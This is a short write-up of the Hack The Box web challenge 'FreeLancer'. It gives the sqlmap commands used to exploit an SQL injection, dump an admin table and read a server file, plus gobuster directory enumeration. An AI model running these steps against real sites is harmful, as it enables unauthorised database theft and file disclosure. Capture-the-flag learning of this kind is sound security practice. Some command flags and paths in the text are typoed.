FreeLancer

HTB WEB CHALLENGE

• CTF Name: FreeLancer
• Resource: Hack The Box CTF
• Difficulty: [30 pts] medium range

Hint: Can you test how secure my website is? Prove me wrong and capture the flag!

Tips: Always check out the source code , if nothing looks suspicious.

from source code we found portfolio.php?id=3

Step2:

SQL Injection using sqlmap :

sqlmap -u “http://docker.hackthebox.eu:30596/portfolio.php?id=3” — dbs

we see data base freelancer

sqlmap -u “http://docker.hackthebox.eu:30596/portfolio.php?id=3” — tables

we see table called safeadmin

sqlmap -u “http://docker.hackthebox.eu:30596/portfolio.php?id=3” -T safeadmin — dump

will find hash uncrackable

Step3:

Try Gobuster

gobuster dir -u “ip” / -w /usr/share/dir/wordlists/common.txt

we found /administrat — Showing 301

Login page is displaying , nothing found anything.

Step4:

Try Dirbuster or gobuster with ip/administrat

found /panel.php & /index.php

/panel.php is redirecting to index,php

Step5:

lets check out the page and i know that standard file directory is something like /var/www/html and then this will hold the files and pages.

Try sqlmap again

sqlmap -u “ip/administrat/panel.php” — file-read=/var/www/html/administat/panel.php then cat that file

Step6:

cat the above file ; you will get the FLAG

Learned:

This CTF taught me about using SQLmap for more than just sql injection .